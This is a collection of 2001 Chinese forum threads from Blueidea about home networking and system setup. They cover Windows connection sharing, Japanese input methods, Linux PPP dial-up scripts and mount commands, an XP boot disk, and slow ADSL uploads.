对不起 ：（ 生活的痛苦远远超过了欢乐的程度
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-08 00:33:22 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
(如果嫌麻烦的话,最好用软件 pppsharlite或则 wingate)

第一步，在作为服务器的微机上安装两块网卡，联接到ISP的网卡取名"外网卡"，联接到局域网的网卡取名"内网卡"；

    第二步，在"外网卡"上配置IP地址和子网掩码（由ISP提供），如IP是10.32.101.11,子网掩码是255.255.255.0(表示局域网规模小于256台);其它都按ISP的要求设置。注意：下面的操作是关键：

    1、在Windows 2000操作系统中，双击"外网卡"连接属性，选"共享"标签，选中"启用此连接的Internet连接共享"项。
    2、在windows 98操作系统中，点设置，控制面板，双击Internet选项，点"连接"标签，单击"局域网设置"下的"共享"选项，选中"启用此连接的Internet连接共享"项。
    第三步，"内网卡"IP地址设为：192.168.0.1。

    第四步，局域网中其它客户机网卡静态设置为192.168.0.2到192.168.0.253之间的任何IP地址，网关、DNS均设为192.168.0.1（即服务器"内网卡"的IP地址），照此设置，即可共享一条线路连上Internet，很简单吧。

[这消息被MOP编辑过(编辑时间2001-11-08 00:35:17)]

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-11-08 01:11:39 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
如果是用猫上网，
2k的猫，就在拨号连接里面打开internet共享。
98的猫，就在ie的internet选项里面打开internet共享。

如果是用网卡上网，那么需要一台机器有双网卡。
在本地连接的属性里面打开internet共享。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

上一贴 | 下一贴
快速回复 | 主题：关于win2k共享上网
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


中文机器可以安装日文输入法嘛？

计算机技术
中文机器可以安装日文输入法嘛？

上一贴 | 下一贴
发表人 主题: 中文机器可以安装日文输入法嘛？
jojo

终级用户
积分：609
发帖：189
来自：山东
注册：2000-12-07
 发表于 2001-12-05 16:07:41 按此观看jojo的个人资料 按此发邮件给jojo jojo 的 oicq 是1569453,查看 1569453 的资料 收藏该主题供以后查看 发送悄悄话给jojo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jojo的IP
还有日文字体也可以吗？

：：：做自己喜欢的事情！：：：
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-05 16:18:33 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
jojo在上个帖子中说
引用:
还有日文字体也可以吗？

控制面板 ----------->输入法 --------->添加------->输入法区域设置------>日语

普通的输入法的软键盘上也可以选日文平假名 和片假名

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

jojo

终级用户
积分：609
发帖：189
来自：山东
注册：2000-12-07
 发表于 2001-12-05 17:26:57 按此观看jojo的个人资料 按此发邮件给jojo jojo 的 oicq 是1569453,查看 1569453 的资料 发送悄悄话给jojo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jojo的IP
yunbin在上个帖子中说
引用:
jojo在上个帖子中说
引用:
还有日文字体也可以吗？

控制面板 ----------->输入法 --------->添加------->输入法区域设置------>日语

普通的输入法的软键盘上也可以选日文平假名 和片假名

可是在添加中没有日语啊，只有表行码，区位和双拼，是装系统时没安装嘛？我的机器是98

：：：做自己喜欢的事情！：：：
ytmgm2001

初级用户
积分：71
发帖：55
来自：湖南－土匪窝
注册：2001-05-26
 发表于 2001-12-05 17:29:15 按此观看ytmgm2001的个人资料 按此发邮件给ytmgm2001 ytmgm2001 的 oicq 是4650148,查看 4650148 的资料 发送悄悄话给ytmgm2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ytmgm2001的IP
jojo在上个帖子中说
引用:
yunbin在上个帖子中说
引用:
jojo在上个帖子中说
引用:
还有日文字体也可以吗？

控制面板 ----------->输入法 --------->添加------->输入法区域设置------>日语

普通的输入法的软键盘上也可以选日文平假名 和片假名

可是在添加中没有日语啊，只有表行码，区位和双拼，是装系统时没安装嘛？我的机器是98

南极星装上，啥都OK＠￣！

一个想不断超越本性的自我!!努力的为变更着自己的个性而努力!不为别的，只为能好好过活点
上一贴 | 下一贴
快速回复 | 主题：中文机器可以安装日文输入法嘛？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


LINUX下拨号上网

计算机技术
LINUX下拨号上网

上一贴 | 下一贴
发表人 主题: LINUX下拨号上网
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-05 19:45:38 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 收藏该主题供以后查看 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
有很多人对LINUX拨号上网很困惑.
________________________________________________________
先假设你的计算机已经安装好了Redhat或者以上版本的Linux，并且Modem已经连接在计算机上。
    第一步：准备Modem
    需要确定Modem在计算机的哪个串口上。最简单的办法是启动Windows95，在控制面板中察看Mode m的属性；在Linux下有一种简单的办法是：先确认Modem已经连接在计算机上，打开Modem电源，MR、HS 灯应该是亮的，然后在提示符下输入以下命令：

    echo AT>/dev/ttyS0

    如果Modem的TR灯亮了，表明Modem连结在COM1口，否则，再试/dev/ttyS1、/dev/ ttyS2、/dev/ttyS3。

    第二步：准备核心

    版本2.0.34的Linux核心已经内置了PPP功能，在此需要确认一下Linux的版本，如果是Redh at5.1就可以跳过这一步，因为Redhat5.1的内核版本即是2.0.34。否则就可能需要重新编译Linux 内核以便支持PPP。

    第三步：准备拨号脚本

    在RedHat5.1中，已经在/usr/doc/ppp-2.3.3/scripts目录下为我们提供了拨号脚本程序的样本，需要我们做的是将其拷贝到正确的目录并将其改为可执行文件，具体操作如下：

    cp/usr/doc/ ppp-2.3.3/scripts/ppp-on/usr/sbin

    cp/usr/doc/ ppp-2.3.3/scripts/ppp-off/usr/sbin

    cp/usr/doc/ ppp-2.3.3/scripts/ppp-on-dialer/etc/ppp

    cd/usr/sbin

    chmod+x ppp-on

    chmod+x ppp-off

    cd/etc/ppp

    chmod+x ppp-on-dialer

    然后根据你的ISP做相应的少许改动。以下是笔者所用的两个脚本ppp-on和ppp-on-dialer的内容：

    ppp-on的内容：

    #!/bin/sh

    #

    # Script to initiate a ppp connection. This is the first part of the

    # pair of scripts. This is not a secure pair of scr ipts as the codes

    # are visible with the'ps' command. However, it is simple.

    #

    # These are the parameters. Change as needed.

    TELEPHONE=96340# ISP提供的上网电话号码

    ACCOUNT=yuangq#账号名称

    PASSWORD=654321#登录密码，注意修改本文件权限以便保密

    LOCAL_IP=0.0.0.0#本地IP地址，0.0.0.0表示由ISP动态分配

    REMOTE_IP=0.0.0.0#远端IP地址，一般为0.0.0.0

    NETMASK=255.255.255.0#子网掩码地址

    #

    # Export them so that they will be available at'ppp -on-dialer' time.

    export TELEPHONE ACCOUNT PASSWORD

    #

    # This is the location of the script which dials th e phone and logs

    # in. Please use the absolute file name as the$PATH variable is not

    # used on the connect option.(To do so on a'root' a ccount would be

    # a security hole so don't ask.)

    #

    DIALER_SCRIPT=/etc/ppp/ppp-on-dialer

    #

    # Initiate the connection

    #

    # I put most of the common options on this command. Please, don't

    # forget the'lock' option or some programs such as mgetty will not

    # work. The asyncmap and escape will permit the PPP link to work with

    # a telnet or rlogin connection. You are welcome to make any changes

    # as desired. Don't use the'defaultroute' option if you currently

    # have a default route to an ethernet gateway.

    #

    exec/usr/sbin/pppd debug lock modem crtscts/dev/tty S1115200 \

    asyncmap20A0000 escape FF kdebug0$LOCAL_IP:$REMOTE_ IP \

    noipdefault netmask$NETMASK defaultroute connect$DI ALER_SCRIPT&

    ppp-on-dialer的内容：

    #!/bin/sh

    #

    # This is part2 of the ppp-on script. It will perfo rm the connection

    # protocol for the desired connection.

    #

    exec chat-v \

    TIMEOUT3 \

    ABORT'\nBUSY\r' \

    ABORT'\nNO ANSWER\r' \

    ABORT'\nRINGING\r\n\r\nRINGING\r' \

    '' \rAT \

    'OK-+++\c-OK' ATH0 \

    TIMEOUT30 \

    OK ATDT$TELEPHONE \

    CONNECT'' \

    sername:--sername:$ACCOUNT \

    assword:$PASSWORD \

    需要注意的是，在ppp-on脚本的最后一行用exec启动pppd的参数中，/dev/ttyS1代表Mo dem连结在COM2口上，115200表示Modem的速率，可以根据实际情况进行修改；此外，如果ISP提供的拨号提示不是username，而是login的话，需要将ppp-on-dialer中的sername改为ogin (即把username和login去掉第一个字母)。

    第四步：配置DNS

    为了能够使用WWW浏览器、ftp、Telnet，还必须配置DNS，可以使用netconf命令进行配置，也可以直接修改/etc/resolv.conf文件，例如笔者的该文件内容如下：

    search szonline.net

    nameserver202.96.154.15

    其中第一行表示域名搜索后缀，第二行为ISP提供的DNS服务器的IP地址。

    第五步：开始拨号上网

    上述准备工作完成之后，以root权限登录，开启Modem，运行ppp-on，该脚本将负责拨号、送出登录信息并完成协议验证，当看到Modem上的数据指示灯停止闪烁并保持连接状态的话，ppp就已经连接成功了。你可以用 netstat-r查看路由表或者pppstats检查ppp的状态，也可以通过Ping你的ISP，或者直接启动N etscape浏览器来检查，如果一切正常的话，那么你的Linux已经连接到Internet了。
(转载:TOM)

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-06 16:46:17 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
是不是哪里写错了? 或者没什么必要啊?
如果是的话, 给这个贴子删了吧~~

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-07 15:51:25 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
MOP在上个帖子中说
引用:
是不是哪里写错了? 或者没什么必要啊?
如果是的话, 给这个贴子删了吧~~

你写的吗？

Blueidea Web Team.
Moderator Of Computer Technology Forum
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-07 15:56:09 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
有的地方给修改了一下而已~

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-07 16:06:30 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
写的好好呀,你知道支持LINUX的硬件配置吗?说说好吗?我想配个LINUX的机器研究呀,但不知道LINUX支持哪些声卡,显卡,还有主版什么的!

^^
MOP

拖把一族
积分：1263
发帖：854
来自：垃圾箱
注册：2001-09-28
 发表于 2001-11-07 16:58:27 按此观看MOP的个人资料 按此发邮件给MOP MOP 的 oicq 是125535345,查看 125535345 的资料 发送悄悄话给MOP 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看MOP的IP
给你推荐几个主板和其他硬件吧~ 微盛MS-6309,微星6309,华硕440BX
先卡型号 :Intel i740,SIS6326 AGP,有的还需要下载相应的驱动程序才可以.
我的有可能过时了一点,你可以再去问一下.
如果真的想买,你可以问他们.他们会给你配一个LINUX配置的机器的

---------------------------------------------
+ MOP FAMILY +
=Blueidea=MOP
上一贴 | 下一贴
快速回复 | 主题：LINUX下拨号上网
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有没有人为我的机子在Linux下算个命！

计算机技术
有没有人为我的机子在Linux下算个命！

上一贴 | 下一贴
发表人 | 主题: 有没有人为我的机子在Linux下算个命！
Amicool 超级用户 积分：425 发帖：149 来自：杭州+温州→浙江→中国 注册：2001-05-28 | 发表于 2001-11-07 15:29:45 按此观看Amicool的个人资料 按此发邮件给Amicool 访问Amicool的主页 Amicool 的 oicq 是1315704,查看 1315704 的资料 收藏该主题供以后查看 发送悄悄话给Amicool 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Amicool的IP 我的机子PⅢ800,小影霸Geforce 2 mx200, LG775FT…… , 装red hat 6时，配置完Xconfigrator，说"no screens found", 装过bluepoint，显示只有2colors或16colors,是不是与我的显卡有问题！我有这个显卡的linux下的驱动！（呵不好意思！我是初学：我不知道怎么找我的分区？比如说在linux下找我的d盘！应该是hda2这样的分法吧！） 但是不知道怎么安装？？ ◇ Javascript，Lotus Develop，Web-Design…… ◆ わたし------Http://www.amicool.net
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2001-11-07 15:43:27 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 在linux里要先挂装才能看到其他文件系统的盘，比如你想看windows下的d盘，可以是： mount -t msdos /dev/hda5 /mnt/d (在此之前要现在/mnt 目录里键一个目录d) 不过具体是hda5还是其他的要看你的分区情况而定。 [这消息被啸编辑过(编辑时间2001-11-07 15:43:48)] Blueidea Web Team. Moderator Of Computer Technology Forum
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2001-11-07 15:48:43 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 这里是比较详细的说明： 安装卸载文件系统 注意：必须使用root登录才能执行。 mount：安装一个文件系统。 umount：卸载一个文件系统。 命令格式： mount [参数][-t 文件系统类型] 设备名 安装目录（mount-point） umount 安装点或设备名（device） 参数说明： -r：将文件系统mount为只读模式。 -w：将文件系统mount为读写模式。 -t 文件系统类型：要安装文件系统的类型。 例如，在/dev/hda2上有一个DOS分区，把它挂在/dosa上，命令为： cd / mkdir dosa mount -tmsdos /dev/hda2 /dosa 这样，用户就可以在/dosa目录下访问这个文件系统。 类似的方法，可以挂上在软盘上的文件系统，命令为： cd / mkdir mnt mount -a -t msdos /dev/fd0 /mnt 列出系统目前mount的文件系统命令： mount 加载光驱： cd / mkdir mnt mount-a -t iso9660 /dev/cdrom /mnt 卸载一个文件系统有两方面的结果：一是使系统缓冲区的内容与磁盘上文件系统的实际内容同步；二是使文件系统从作为安装点（mount-point）的目录脱离，文件系统将不能再使用。 例如，umount /dev/fd0命令卸载/dev/fd0（软盘）上的文件系统。 同样，卸载任何一个挂在特定目录上的文件系统都使用类似umount /mnt的命令。 例如，umount /dosa和umount /dev/hda2都是卸载安装的文件系统。 Blueidea Web Team. Moderator Of Computer Technology Forum
Amicool 超级用户 积分：425 发帖：149 来自：杭州+温州→浙江→中国 注册：2001-05-28 | 发表于 2001-11-07 16:30:34 按此观看Amicool的个人资料 按此发邮件给Amicool 访问Amicool的主页 Amicool 的 oicq 是1315704,查看 1315704 的资料 发送悄悄话给Amicool 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Amicool的IP 谢谢兄弟，我去试试！ ◇ Javascript，Lotus Develop，Web-Design…… ◆ わたし------Http://www.amicool.net
上一贴 | 下一贴
快速回复 | 主题：有没有人为我的机子在Linux下算个命！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何创建XP的启动盘！！！如何卸载XP！！！

计算机技术
如何创建XP的启动盘！！！如何卸载XP！！！

上一贴 | 下一贴
发表人 | 主题: 如何创建XP的启动盘！！！如何卸载XP！！！
yixinguy78 终级用户 积分：526 发帖：188 来自：china 注册：2001-02-10 | 发表于 2001-12-29 15:06:15 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP 用XP真苦！ ？？？？？？？？？？？？？！！！！！！！！！！！！！！
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-01 11:54:02 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 1、microsoft 已经发布了专用的启动盘制作软件，需要6张软盘 2、卸载集format，最彻底
t1234a 初级用户 积分：59 发帖：55 来自：china-jinan 注册：2001-03-24 | 发表于 2002-01-01 19:55:12 按此观看t1234a的个人资料 按此发邮件给t1234a t1234a 的 oicq 是29040183,查看 29040183 的资料 发送悄悄话给t1234a 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看t1234a的IP 楼上的给个 地址好不好?
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-02 01:03:37 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent http://support.microsoft.com/default.aspx?scid=kb;en-us;Q310994&ID=310994
上一贴 | 下一贴
快速回复 | 主题：如何创建XP的启动盘！！！如何卸载XP！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有没有在上海用ADSL的？？？？

计算机技术
有没有在上海用ADSL的？？？？

上一贴 | 下一贴
发表人 主题: 有没有在上海用ADSL的？？？？
珊瑚

初级用户
积分：59
发帖：85
来自：
注册：2001-02-05
 发表于 2001-11-07 11:41:48 按此观看珊瑚的个人资料 按此发邮件给珊瑚 收藏该主题供以后查看 发送悄悄话给珊瑚 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚的IP
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。
横平

初级用户
积分：116
发帖：94
来自：上海
注册：2001-05-28
 发表于 2001-11-07 18:33:11 按此观看横平的个人资料 按此发邮件给横平 访问横平的主页 横平 的 oicq 是25674539,查看 25674539 的资料 发送悄悄话给横平 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看横平的IP
我的一般20K左右，没有问题的！

在逆境中成长的设计!
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-07 21:55:11 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
你的服务器有问题,我这里一般都在50K以上~
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-08 09:34:45 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

你们那的ADSL怎么这么慢????我这顺德的上行速度150K,下行速度250K以上,你装ADSL的时候没按照说明装吧.........里面有个东西要进入DOS里面改的,具体说名我也忘记拉,你上网去搜索一下吧

^^
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-08 09:38:19 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
软硬兼施在上个帖子中说
引用:
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

你们那的ADSL怎么这么慢????我这顺德的上行速度150K,下行速度250K以上,你装ADSL的时候没按照说明装吧.........里面有个东西要进入DOS里面改的,具体说名我也忘记拉,你上网去搜索一下吧

因为你在顺德,我们在上海.............上海的ADSL限速512K
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-11-08 10:05:51 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

试试修改一下你的FTP模式为 passive

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-08 10:33:01 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
小诺在上个帖子中说
引用:
软硬兼施在上个帖子中说
引用:
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

你们那的ADSL怎么这么慢????我这顺德的上行速度150K,下行速度250K以上,你装ADSL的时候没按照说明装吧.........里面有个东西要进入DOS里面改的,具体说名我也忘记拉,你上网去搜索一下吧

因为你在顺德,我们在上海.............上海的ADSL限速512K

那应该不影响你的上传吧

^^
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-08 11:08:38 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
软硬兼施在上个帖子中说
引用:
小诺在上个帖子中说
引用:
软硬兼施在上个帖子中说
引用:
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

你们那的ADSL怎么这么慢????我这顺德的上行速度150K,下行速度250K以上,你装ADSL的时候没按照说明装吧.........里面有个东西要进入DOS里面改的,具体说名我也忘记拉,你上网去搜索一下吧

因为你在顺德,我们在上海.............上海的ADSL限速512K

那应该不影响你的上传吧

为什么不影响?
珊瑚

初级用户
积分：59
发帖：85
来自：
注册：2001-02-05
 发表于 2001-11-08 19:07:20 按此观看珊瑚的个人资料 按此发邮件给珊瑚 发送悄悄话给珊瑚 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚的IP
蓝色在上个帖子中说
引用:
珊瑚在上个帖子中说
引用:
你们的FTP上传速度则样？
我这边几乎等于0，传不上去~
什么时间都这样，
网页访问正常。

试试修改一下你的FTP模式为 passive

在哪里可以改呀~`我不懂~~
我用的是cuteftp,我试者用别的软件也是这样~

[这消息被珊瑚编辑过(编辑时间2001-11-08 19:07:51)]

珊瑚

初级用户
积分：59
发帖：85
来自：
注册：2001-02-05
 发表于 2001-11-08 19:37:16 按此观看珊瑚的个人资料 按此发邮件给珊瑚 发送悄悄话给珊瑚 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚的IP
找到了~改了~还是没用~
上传速度从8K直线下降到0。0XK~
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-08 19:49:07 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
换个服务器试试~
珊瑚

初级用户
积分：59
发帖：85
来自：
注册：2001-02-05
 发表于 2001-11-08 19:58:29 按此观看珊瑚的个人资料 按此发邮件给珊瑚 发送悄悄话给珊瑚 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看珊瑚的IP
不是服务器的问题~我让朋友帮我传过~他那边很快
我的主页在51。NET上~
我这边访问挺快的~
FTP也能很快连上，但就是传不上~

[这消息被珊瑚编辑过(编辑时间2001-11-08 20:01:23)]

donger

SmallOgre
积分：5913
发帖：3342
来自：
注册：2000-07-22
 发表于 2001-11-09 09:31:14 按此观看donger的个人资料 按此发邮件给donger 访问donger的主页 发送悄悄话给donger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看donger的IP
没碰到过这种问题，我家ADSL用FTP上传也有50K左右

Enough is as good as a feast.

Blueidea Web Team

上一贴 | 下一贴
快速回复 | 主题：有没有在上海用ADSL的？？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ADSL宽带装好了，盟军2的正版也买了

论坛灌水区
ADSL宽带装好了，盟军2的正版也买了 (页 1)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: ADSL宽带装好了，盟军2的正版也买了
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-09-29 09:41:13 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 收藏该主题供以后查看 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
太好了，这个国庆过的真是爽啊。

可惜新的盟军，和原来的差别不小，我都不会用，看说明得好半会儿。

顺便说一下。ADSL从申请，到安装只用了5天，费用打了折，只花了900。

现在问一个问题。

我想JIMBOB共享这条ADSL。现在ADSL直接联接到HUB，

本来想用 telnet 到adsl 拨号，但出现password ，这个口令也没有猜出来

我只有用WinPoET2.51拨号。但JIMBOB就不能访问了。请问大家有什么解决办法吗。

adsl 是中兴的ADSL831

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

danger

|危险|
积分：4264
发帖：4253
来自：}Earth{
注册：2001-06-15
 发表于 2001-09-29 09:56:01 按此观看danger的个人资料 按此发邮件给danger 访问danger的主页 danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看danger的IP
恭喜，羡慕！！！！！

我们这只能装ISDN！！！！

Dangerous...

Blueidea Web Team
Moderator Of Flash forum

阿奇

超级用户
积分：398
发帖：316
来自：火星
注册：2000-08-30
 发表于 2001-09-29 10:19:26 按此观看阿奇的个人资料 按此发邮件给阿奇 访问阿奇的主页 阿奇 的 oicq 是498391,查看 498391 的资料 发送悄悄话给阿奇 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿奇的IP
共享?用sygate或者wingate不就行了吗?

--------------------------------
SIW
{ http://aqi.126.com }
{ http://designhouse.cc.net.cn }
----------------------------------
blink

初级用户
积分：18
发帖：55
来自：南京
注册：2001-09-22
 发表于 2001-09-29 10:24:08 按此观看blink的个人资料 按此发邮件给blink blink 的 oicq 是20092850,查看 20092850 的资料 发送悄悄话给blink 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blink的IP
ADSL上网费用怎么算啊?一个月得花多少钱?

在痛苦中寻找快乐！
caience

冬天是红色
积分：2644
发帖：2438
